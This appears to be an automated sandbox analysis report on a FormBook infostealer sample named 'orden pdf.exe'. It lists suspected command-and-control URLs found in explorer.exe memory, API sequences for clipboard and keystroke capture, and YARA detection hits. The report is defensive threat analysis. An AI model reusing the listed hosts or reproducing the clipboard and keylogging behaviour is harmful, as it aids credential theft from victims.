          Source: explorer.exe, 00000003.00000003.555178824.0000000008907000.00000004.00000001.sdmpString found in binary or memory: http://www.hydrabadproperties.comReferer:
          Source: explorer.exe, 00000003.00000000.268773020.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
          Source: explorer.exe, 00000003.00000003.555178824.0000000008907000.00000004.00000001.sdmpString found in binary or memory: http://www.joomlas123.info
          Source: explorer.exe, 00000003.00000003.555178824.0000000008907000.00000004.00000001.sdmpString found in binary or memory: http://www.joomlas123.info/n7ak/
          Source: explorer.exe, 00000003.00000003.555178824.0000000008907000.00000004.00000001.sdmpString found in binary or memory: http://www.joomlas123.info/n7ak/www.office4u.info
          Source: explorer.exe, 00000003.00000003.555178824.0000000008907000.00000004.00000001.sdmpString found in binary or memory: http://www.joomlas123.infoReferer:
          Source: explorer.exe, 00000003.00000003.555178824.0000000008907000.00000004.00000001.sdmpString found in binary or memory: http://www.librosdecienciaficcion.com
          Source: explorer.exe, 00000003.00000003.555178824.0000000008907000.00000004.00000001.sdmpString found in binary or memory: http://www.librosdecienciaficcion.com/n7ak/
          Source: explorer.exe, 00000003.00000003.555178824.0000000008907000.00000004.00000001.sdmpString found in binary or memory: http://www.librosdecienciaficcion.com/n7ak/MicrM
          Source: explorer.exe, 00000003.00000003.555178824.0000000008907000.00000004.00000001.sdmpString found in binary or memory: http://www.librosdecienciaficcion.comReferer:
          Source: explorer.exe, 00000003.00000003.555178824.0000000008907000.00000004.00000001.sdmpString found in binary or memory: http://www.manfast.online
          Source: explorer.exe, 00000003.00000003.555178824.0000000008907000.00000004.00000001.sdmpString found in binary or memory: http://www.manfast.online/n7ak/
          Source: explorer.exe, 00000003.00000003.555178824.0000000008907000.00000004.00000001.sdmpString found in binary or memory: http://www.manfast.online/n7ak/www.ultimatewindowusa.com
          Source: explorer.exe, 00000003.00000003.555178824.0000000008907000.00000004.00000001.sdmpString found in binary or memory: http://www.manfast.onlineReferer:
          Source: explorer.exe, 00000003.00000003.555178824.0000000008907000.00000004.00000001.sdmpString found in binary or memory: http://www.myultimateleadgenerator.com
          Source: explorer.exe, 00000003.00000003.555178824.0000000008907000.00000004.00000001.sdmpString found in binary or memory: http://www.myultimateleadgenerator.com/n7ak/
          Source: explorer.exe, 00000003.00000003.555178824.0000000008907000.00000004.00000001.sdmpString found in binary or memory: http://www.myultimateleadgenerator.com/n7ak/www.manfast.online
          Source: explorer.exe, 00000003.00000003.555178824.0000000008907000.00000004.00000001.sdmpString found in binary or memory: http://www.myultimateleadgenerator.comReferer:
          Source: explorer.exe, 00000003.00000003.555178824.0000000008907000.00000004.00000001.sdmpString found in binary or memory: http://www.office4u.info
          Source: explorer.exe, 00000003.00000003.555178824.0000000008907000.00000004.00000001.sdmpString found in binary or memory: http://www.office4u.info/n7ak/
          Source: explorer.exe, 00000003.00000003.555178824.0000000008907000.00000004.00000001.sdmpString found in binary or memory: http://www.office4u.info/n7ak/www.hanaleedossmann.com
          Source: explorer.exe, 00000003.00000003.555178824.0000000008907000.00000004.00000001.sdmpString found in binary or memory: http://www.office4u.infoReferer:
          Source: explorer.exe, 00000003.00000003.555178824.0000000008907000.00000004.00000001.sdmpString found in binary or memory: http://www.s-immotanger.com
          Source: explorer.exe, 00000003.00000003.555178824.0000000008907000.00000004.00000001.sdmpString found in binary or memory: http://www.s-immotanger.com/n7ak/
          Source: explorer.exe, 00000003.00000003.555178824.0000000008907000.00000004.00000001.sdmpString found in binary or memory: http://www.s-immotanger.com/n7ak/www.joomlas123.info
          Source: explorer.exe, 00000003.00000003.555178824.0000000008907000.00000004.00000001.sdmpString found in binary or memory: http://www.s-immotanger.comReferer:
          Source: explorer.exe, 00000003.00000000.268773020.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.sajatypeworks.com
          Source: explorer.exe, 00000003.00000000.268773020.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.sakkal.com
          Source: explorer.exe, 00000003.00000000.268773020.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.sandoll.co.kr
          Source: explorer.exe, 00000003.00000000.268773020.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.tiro.com
          Source: explorer.exe, 00000003.00000000.268773020.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.typography.netD
          Source: explorer.exe, 00000003.00000003.555178824.0000000008907000.00000004.00000001.sdmpString found in binary or memory: http://www.ultimatewindowusa.com
          Source: explorer.exe, 00000003.00000003.555178824.0000000008907000.00000004.00000001.sdmpString found in binary or memory: http://www.ultimatewindowusa.com/n7ak/
          Source: explorer.exe, 00000003.00000003.555178824.0000000008907000.00000004.00000001.sdmpString found in binary or memory: http://www.ultimatewindowusa.com/n7ak/www.excelcapfunding.com
          Source: explorer.exe, 00000003.00000003.555178824.0000000008907000.00000004.00000001.sdmpString found in binary or memory: http://www.ultimatewindowusa.comReferer:
          Source: explorer.exe, 00000003.00000003.555178824.0000000008907000.00000004.00000001.sdmpString found in binary or memory: http://www.unbelievabowboutique.com
          Source: explorer.exe, 00000003.00000003.555178824.0000000008907000.00000004.00000001.sdmpString found in binary or memory: http://www.unbelievabowboutique.com/n7ak/
          Source: explorer.exe, 00000003.00000003.555178824.0000000008907000.00000004.00000001.sdmpString found in binary or memory: http://www.unbelievabowboutique.com/n7ak/www.bepbosch.com
          Source: explorer.exe, 00000003.00000003.555178824.0000000008907000.00000004.00000001.sdmpString found in binary or memory: http://www.unbelievabowboutique.comReferer:
          Source: explorer.exe, 00000003.00000000.268773020.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.urwpp.deDPlease
          Source: explorer.exe, 00000003.00000003.555178824.0000000008907000.00000004.00000001.sdmpString found in binary or memory: http://www.wwwswty6655.com
          Source: explorer.exe, 00000003.00000003.555178824.0000000008907000.00000004.00000001.sdmpString found in binary or memory: http://www.wwwswty6655.com/n7ak/
          Source: explorer.exe, 00000003.00000003.555178824.0000000008907000.00000004.00000001.sdmpString found in binary or memory: http://www.wwwswty6655.com/n7ak/www.hydrabadproperties.com
          Source: explorer.exe, 00000003.00000003.555178824.0000000008907000.00000004.00000001.sdmpString found in binary or memory: http://www.wwwswty6655.comReferer:
          Source: explorer.exe, 00000003.00000000.268773020.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
          Source: C:\Users\user\Desktop\orden pdf.exeCode function: 0_2_001C6B0C OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,0_2_001C6B0C
          Source: C:\Users\user\Desktop\orden pdf.exeCode function: 0_2_001C6B0C OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,0_2_001C6B0C
          Source: C:\Users\user\Desktop\orden pdf.exeCode function: 0_2_001B2B37 GetKeyboardState,GetAsyncKeyState,GetKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,0_2_001B2B37
          Source: orden pdf.exe, 00000000.00000003.250435560.0000000001712000.00000004.00000001.sdmpBinary or memory string: _WINAPI_REGISTERRAWINPUTDEVICES
          Source: C:\Users\user\Desktop\orden pdf.exeCode function: 0_2_001DF7FF DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,0_2_001DF7FF
          Source: C:\Users\user\Desktop\orden pdf.exeCode function: 1_2_001DF7FF DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,1_2_001DF7FF

          E-Banking Fraud:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 00000000.00000003.234787113.0000000004C7D000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.300045336.00000000016D0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000003.281421598.0000000003FA3000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000001B.00000003.475384338.0000000004880000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000E.00000002.607214261.0000000004750000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.254106611.00000000039E0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000E.00000002.607131734.0000000004720000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000E.00000002.595803176.0000000000930000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000003.290887183.000000000405B000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000001B.00000003.475944331.0000000004881000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.299989543.00000000016A0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000003.235563814.0000000004C51000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000001B.00000003.471310625.0000000006199000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000003.237790988.00000000045AA000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000003.234835560.0000000004604000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000003.286789881.00000000046AD000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.299600121.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000001B.00000003.471275038.0000000004F2E000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000001B.00000003.472988822.00000000061C4000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000003.237750274.00000000045A9000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 2.2.orden pdf.exe.400000.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.orden pdf.exe.400000.1.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.orden pdf.exe.39e0000.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.orden pdf.exe.39e0000.1.unpack, type: UNPACKEDPE

          System Summary:

          bar